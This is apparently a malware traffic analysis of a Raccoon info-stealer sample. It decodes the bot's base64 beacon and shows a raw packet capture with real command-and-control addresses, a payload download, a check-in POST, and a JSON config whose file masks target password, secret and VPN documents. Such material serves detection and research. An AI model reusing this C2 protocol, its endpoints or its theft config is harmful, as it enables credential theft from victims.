This is the latest sample of Raccoon which is an info stealer type malware available as a Malware as a Service. It can be obtained for a subscription and costs $200 per month. Raccoon malware has already infected over 100,000 devices and became one of the most mentioned viruses on the underground forums in 2019.
This malware uses base64 encoding for each infected host as you can see below in the packets and here is what it looks like decoded:
echo “Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw=” | base64 -d
bot_id=D50171F3-B1FD-41C9-AFBF-3DD2F72C90B7_ry4wn&config_id=2141da92b4ad3ac837e01675ce3a1681885395e0&data=null
bot_id=D50171F3-B1FD-41C9-AFBF-3DD2F72C90B7_ry4wn&config_id=2141da92b4ad3ac837e01675ce3a1681885395e0&data=null
2020-05-09 02:34:34.532063 IP 192.168.86.25.56399 > 217.8.117.89.80: Flags [P.], seq 1:398, ack 1, win 16425, length 397: HTTP: GET /svchost.exe HTTP/1.1
E…+`@…h…V…uY.O.P..L…..P.@)….GET /svchost.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 217.8.117.89
Connection: Keep-Alive
2020-05-09 02:34:34.685440 IP 217.8.117.89.80 > 192.168.86.25.56399: Flags [.], ack 398, win 237, length 0
E..(.P@.*..\..uY..V..P.O……NdP…B+……..
2020-05-09 02:34:34.690750 IP 217.8.117.89.80 > 192.168.86.25.56399: Flags [.], seq 1:1437, ack 398, win 237, length 1436: HTTP: HTTP/1.1 200 OK
E….Q@.*…..uY..V..P.O……NdP….:..HTTP/1.1 200 OK
Date: Sat, 09 May 2020 06:35:24 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 08 May 2020 06:18:36 GMT
ETag: “83800-5a51cf7a4e700”
Accept-Ranges: bytes
Content-Length: 538624
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
2020-05-09 02:34:46.739624 IP 192.168.86.25.56400 > 151.101.0.133.443: Flags [P.], seq 1:130, ack 1, win 16403, length 129
E…+.@…….V..e…P….d..*..P.@.0…….|…x..^.H..8….^……..qK…9…i3+…../.5…
….. .
.2.8…….7…………..raw.githubusercontent.com.
…………..
2020-05-09 02:34:46.763774 IP 151.101.0.133.443 > 192.168.86.25.56400: Flags [.], ack 130, win 57, length 0
E..(.#@.7….e….V….P.*….eAP..9.9……..
2020-05-09 02:34:46.764848 IP 151.101.0.133.443 > 192.168.86.25.56400: Flags [.], seq 1:1397, ack 130, win 57, length 1396
E….$@.7….e….V….P.*….eAP..9……..]…Y….d.:.w..+.f..F..3.<.1Z.DOWNGRD. 9+.x…….ha..J.}…go….CZ…………………………………40..00………..I>…7Z-….C..0.. *.H……..0p1.0 ..U….US1.0…U.
..DigiCert Inc1.0…U….www.digicert.com1/0-..U…&DigiCert SHA2 High Assurance Server CA0…200506000000Z..220414120000Z0j1.0 ..U….US1.0…U…
California1.0…U….San Francisco1.0…U.
..GitHub, Inc.1.0…U….www.github.com0..”0.. *.H………….0..
……>=.2}…\..w..g…).r6jA….9.,….QY..
?..<….M….>…#.b………U..rh..R.<.!..%’6.sC..vU^RH..\..6…+….M..1…..E._+…2.8,)..$…Z……b.@,..G…=.W.h..X.O….”…7.W?;+..(……. +}a5…C…:..}nS.8…4………..a/…….v.sM..0…..F#.7}……………0…0…U.#..0…Qh…..u<..edb…Yr;0…U……..
iG..2.M..Eb_./.N:0{..U…t0r..www.github.com..*.github.com.
github.com..*.github.io. github.io..*.githubusercontent.com..githubusercontent.com0…U………..0…U.%..0…+………+…….0u..U…n0l04.2.0..http://crl3.digicert.com/sha2-ha-server-g6.crl04.2.0..http://crl4.digicert.com/sha2-ha-server-g6.crl0L..U. .E0C07.
`.H…l..0*0(..+………https://www.digicert.com/CPS0…g…..0….+……..w0u0$..+…..0…http://ocsp.digicert.com0M..+…..0..Ahttp://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0…U…….0.0..}.
+…..y……m…i.g.v.F.U.u.. 0…i..}.,At..I…..p.mG…q./…….G0E.!……..
…….}…L
2020-05-09 02:34:46.765979 IP 151.101.0.133.443 > 192.168.86.25.56400: Flags [.], seq 1397:2793, ack 130, win 57, length 1396
E….%@.7….e….V….P.+….eAP..9=^..Q..D……aH. .q&…!.RZ9..%…rQ..3o.3U.Q..:..u.”EE.YU$V.?./..m..#&c..K.]..\n……q./…….F0D. f.8..6…….!~…a…T`….}$S.. g>…H) .<..i……<……dn]i…v.Q…..y.Vm.7x…z..’….B……….q./. …..G0E. .?.I~L .Z.)..^..>o)..:.N…q.c…!../7..Eu.P…mf.T.<….&…..z W.0.. *.H……………..?….n…Gfh..Y……K..H.s…&….\J..x…NI….^p..^.%.W….t.T.6…….K.u.5.r…..;v….*T..$.O.z..HAd.yg…7..LeXe 4h.. .%]../.:…a.H…v>,.n…i}&.Y.}……G……K..k..a..eE!._.C…7 .;lMb-c…..+a../5.9N)1.^.$[.._..b………….D..G80{r. ..x….0…0……………\..m.+B.]..0.. *.H……..0l1.0 ..U….US1.0…U.
..DigiCert Inc1.0…U….www.digicert.com1+0)..U…”DigiCert High Assurance EV Root CA0…131022120000Z..281022120000Z0p1.0 ..U….US1.0…U.
..DigiCert Inc1.0…U….www.digicert.com1/0-..U…&DigiCert SHA2 High Assurance Server CA0..”0.. *.H………….0..
……./.$..m._..
2020-05-09 02:34:46.971465 IP 192.168.86.25.56401 > 34.89.22.128.80: Flags [P.], seq 1:189, ack 1, win 16685, length 188: HTTP: POST /gate/log.php HTTP/1.1
E…+.@…~…V.”Y…Q.P9…9i%.P.A-….POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 34.89.22.128
2020-05-09 02:34:46.971475 IP 192.168.86.25.56401 > 34.89.22.128.80: Flags [P.], seq 189:344, ack 1, win 16685, length 155: HTTP
E…+.@…~…V.”Y…Q.P9…9i%.P.A-….params=Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw=
2020-05-09 02:34:47.267855 IP 34.89.22.128.80 > 192.168.86.25.56401: Flags [P.], seq 1:1112, ack 344, win 508, length 1111: HTTP: HTTP/1.1 200 OK
E…?.@…..”Y….V..P.Q9i%.9..YP….v..HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 09 May 2020 06:36:06 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
380
{“url”:”http://34.89.22.128/file_handler/file.php?hash=196880b27e06197d171bf944d311f8ff63715f76&js=9e862d9b0efd325167e20ad356b9eda91bf37b8d&callback=http://34.89.22.128/gate”,”attachment_url”:”http://34.89.22.128/gate/sqlite3.dll”,”libraries”:”http://34.89.22.128/gate/libs.zip”,”ip”:”73.135.186.44″,”location”:{“country”:”United States”,”country_code”:”US”,”state”:”Maryland”,”state_code”:”MD”,”city”:”Catonsville”,”zip”:21228,”latitude”:39.2812,”longitude”:-76.7406},”config”:{“masks”:[{“name”:12,”subfolders”:[“true”],”size_limit”:40,”mask”:”secret.txt, secret.doc, secret.docx, secret*.txt, secret*.doc, secret*.docx, pass.txt, pass.doc, pass.docx, pass*.txt, pass*.doc, pass*.docx, vpn.txt, vpn.doc, vpn.docx, vpn*.txt, vpn*.doc, vpn*.docx, *vpn.txt, *vpn.doc, *vpn.docx”,”path”:”%USERPROFILE%\\”}],”loader_urls”:null},”lu”:null,”rm”:1,”is_screen_enabled”:1,”is_history_enabled”:1,”depth”:3}
0
2020-05-09 02:34:47.290435 IP 192.168.86.25.56402 > 34.89.22.128.80: Flags [S], seq 222080979, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4+.@….-..V.”Y…R.P.<…….. .e……………
2020-05-09 02:34:47.409675 IP 34.89.22.128.80 > 192.168.86.25.56402: Flags [S.], seq 1599144664, ack 222080980, win 65320, options [mss 1420,nop,nop,sackOK,nop,wscale 7], length 0
E..4..@….)”Y….V..P.R_Q…<…..($……………
2020-05-09 02:34:47.409919 IP 192.168.86.25.56402 > 34.89.22.128.80: Flags [.], ack 1, win 16685, length 0
E..(+.@….8..V.”Y…R.P.<.._Q..P.A-#/……..
2020-05-09 02:34:47.413914 IP 192.168.86.25.56402 > 34.89.22.128.80: Flags [P.], seq 1:268, ack 1, win 16685, length 267: HTTP: GET /gate/sqlite3.dll HTTP/1.1
E..3+.@…~,..V.”Y…R.P.<.._Q..P.A-….GET /gate/sqlite3.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 34.89.22.128
Connection: Keep-Alive
2020-05-09 02:34:47.600549 IP 34.89.22.128.80 > 192.168.86.25.56402: Flags [.], seq 1:1421, ack 268, win 509, length 1420: HTTP: HTTP/1.1 200 OK
E…]f@….C”Y….V..P.R_Q…<..P….Y..HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 09 May 2020 06:36:06 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Mon, 18 Mar 2019 19:52:10 GMT
ETag: “5c8ff6ea-dfcff”
Accept-Ranges: bytes
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..